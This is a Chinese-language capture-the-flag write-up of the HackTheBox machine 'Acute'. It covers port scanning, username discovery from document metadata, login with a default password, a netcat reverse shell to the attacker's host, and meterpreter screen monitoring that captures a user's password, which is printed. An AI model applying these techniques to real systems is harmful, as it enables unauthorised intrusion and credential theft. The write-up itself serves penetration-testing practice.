Acute
信息收集
端口扫描
全端口扫描
┌──(kali㉿kali)-[~/acute]
└─$ sudo nmap -sT -p- --min-rate 1000 10.10.11.145 -oA nmap/ports
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:47 EST
Nmap scan report for 10.10.11.145
Host is up (0.079s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 119.98 seconds
默认脚本扫描
┌──(kali㉿kali)-[~/acute]
└─$ sudo nmap -sT -sC -sV -p 443 10.10.11.145 -oA nmap/sC
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:49 EST
Nmap scan report for 10.10.11.145
Host is up (0.080s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: 2024-12-13T14:35:34+00:00; -14m19s from scanner time.
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -14m19s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.63 seconds
漏洞脚本扫描
┌──(kali㉿kali)-[~/acute]
└─$ sudo nmap -sT --script=vuln -p 443 80 10.10.11.145 -oA nmap/vuln
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:49 EST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Stats: 0:03:22 elapsed; 1 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.12% done; ETC: 09:53 (0:00:01 remaining)
Stats: 0:03:22 elapsed; 1 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.12% done; ETC: 09:53 (0:00:01 remaining)
Nmap scan report for 10.10.11.145
Host is up (0.079s latency).
PORT STATE SERVICE
443/tcp open https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
Nmap done: 2 IP addresses (1 host up) scanned in 1332.37 seconds
UDP扫描
──(kali㉿kali)-[~/acute]
└─$ sudo nmap -sU --top-ports 20 10.10.11.145 -oA nmap/UDP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:53 EST
Nmap scan report for 10.10.11.145
Host is up (0.41s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 10.02 seconds
Web 信息收集
访问是404,默认脚本有域名的信息,先改一下hosts
┌──(kali㉿kali)-[~/acute]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.145 atsserver.acute.local
10.10.11.145 acute.local
子域枚举 (VHost)
查找一下有没有其他子域名,没有什么发现
┌──(kali㉿kali)-[~/acute] └─$ gobuster vhost -u https://10.10.11.145 --domain acute.local -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --append-domain -k -r -t 100
=============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.11.145 [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] User Agent: gobuster/3.6 [+] Timeout: 10s [+] Append Domain: true =============================================================== Starting gobuster in VHOST enumeration mode =============================================================== Found: -.acute.local Status: 400 [Size: 334] Found: %20.acute.local Status: 400 [Size: 334] Found: *checkout*.acute.local Status: 400 [Size: 334] Found: -1.acute.local Status: 400 [Size: 334] Found: *docroot*.acute.local Status: 400 [Size: 334] Found: *.acute.local Status: 400 [Size: 334] Found: -buy.acute.local Status: 400 [Size: 334] Found: 4%20Color%2099%20IT2.acute.local Status: 400 [Size: 334] Found: %7Emike.acute.local Status: 400 [Size: 334] Found: http%3A%2F%2Fwww.acute.local Status: 400 [Size: 334] Found: http%3A.acute.local Status: 400 [Size: 334] Found: MSNBC%20Interactive.acute.local Status: 400 [Size: 334] Found: Picture%201.acute.local Status: 400 [Size: 334]
about 页面与员工信息
在about.html中发现右上角可以下载一个文件(这也太小了)

在文件中我们发现了一个https://atsserver.acute.local/Acute_Staff_Access和admin的名字Lois以及默认密码Password1!
访问发现应该是员工的远程webshell管理后台

访问about.html同时也能发现一些员工的名字

Aileen Wallace
Charlotte Hall
Evan Davies
Ieuan Monks
Joshua Morgan
Lois Hopkins
员工名字典爆破
用名字做一下字典
┌──(kali㉿kali)-[~/acute]
└─$ cat users.txt
Aileen
Charlotte
Evan
Ieuan
Joshua
Lois
Aileen Wallace
Charlotte Hall
Evan Davies
Ieuan Monks
Joshua Morgan
Lois Hopkins
aileen
charlotte
evan
ieuan
joshua
lois
Wallace
Hall
Davies
Monks
Morgan
Hopkins
wallace
hall
davies
monks
morgan
hopkins
文档元数据分析
用bp爆破一下,结果一个都没有成功

信息搜集还是不到位,再看一眼其他的信息,下载的docx有可能有敏感信息吗
┌──(kali㉿kali)-[~/acute]
└─$ exiftool ~/Downloads/New_Starter_CheckList_v7.docx
ExifTool Version Number : 13.00
File Name : New_Starter_CheckList_v7.docx
Directory : /home/kali/Downloads
File Size : 35 kB
File Modification Date/Time : 2024:12:13 11:43:43-05:00
File Access Date/Time : 2024:12:13 11:43:52-05:00
File Inode Change Date/Time : 2024:12:13 11:43:44-05:00
File Permissions : -rw-rw-r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x079b7eb2
Zip Compressed Size : 428
Zip Uncompressed Size : 2527
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
Revision Number : 8
Last Printed : 2021:01:04 15:54:00Z
Create Date : 2021:12:08 14:21:00Z
Modify Date : 2021:12:22 00:39:00Z
Template : Normal.dotm
Total Edit Time : 2.6 hours
Pages : 3
Words : 886
Characters : 5055
Application : Microsoft Office Word
Doc Security : None
Lines : 42
Paragraphs : 11
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : University of Marvel
Links Up To Date : No
Characters With Spaces : 5930
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000
用户名命名规则与新字典
可以看到创建者是FCastle,应该遵守了某种命名规则 主机名为Acute-PC01
重新做一个用户字典
┌──(kali㉿kali)-[~/acute]
└─$ cat users.txt
AWallace
CHall
EDavies
IMonks
JMorgan
LHopkins
漏洞利用
登录后台获取 shell
edavies 似乎是特殊的

成功登入

反向 shell 获取
先传个nc上去弹个shell
┌──(kali㉿kali)-[~/acute]
└─$ sudo rlwrap -cAr nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [10.10.16.13] from (UNKNOWN) [10.10.11.145] 49828
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\edavies\Documents> clear
clear
PS C:\Users\edavies\Documents> whoami
whoami
acute\edavies
PS C:\Users\edavies\Documents> ls
ls
Directory: C:\Users\edavies\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 14/12/2024 07:23 45272 nc64.exe
权限提升
本地枚举与任务目录
利用winpeas进行枚举,发现C:\windows\tasks可写,尝试添加恶意脚本进去但是失败了

RDP 会话与屏幕监控
枚举的时候发现存在rdp会话
PS C:\utils> qwinsta
qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
console edavies 1 Active
利用meterpreter获取屏幕实时监控

获取桌面凭据
用户为imonks
密码为w3_4R3_th3_f0rce.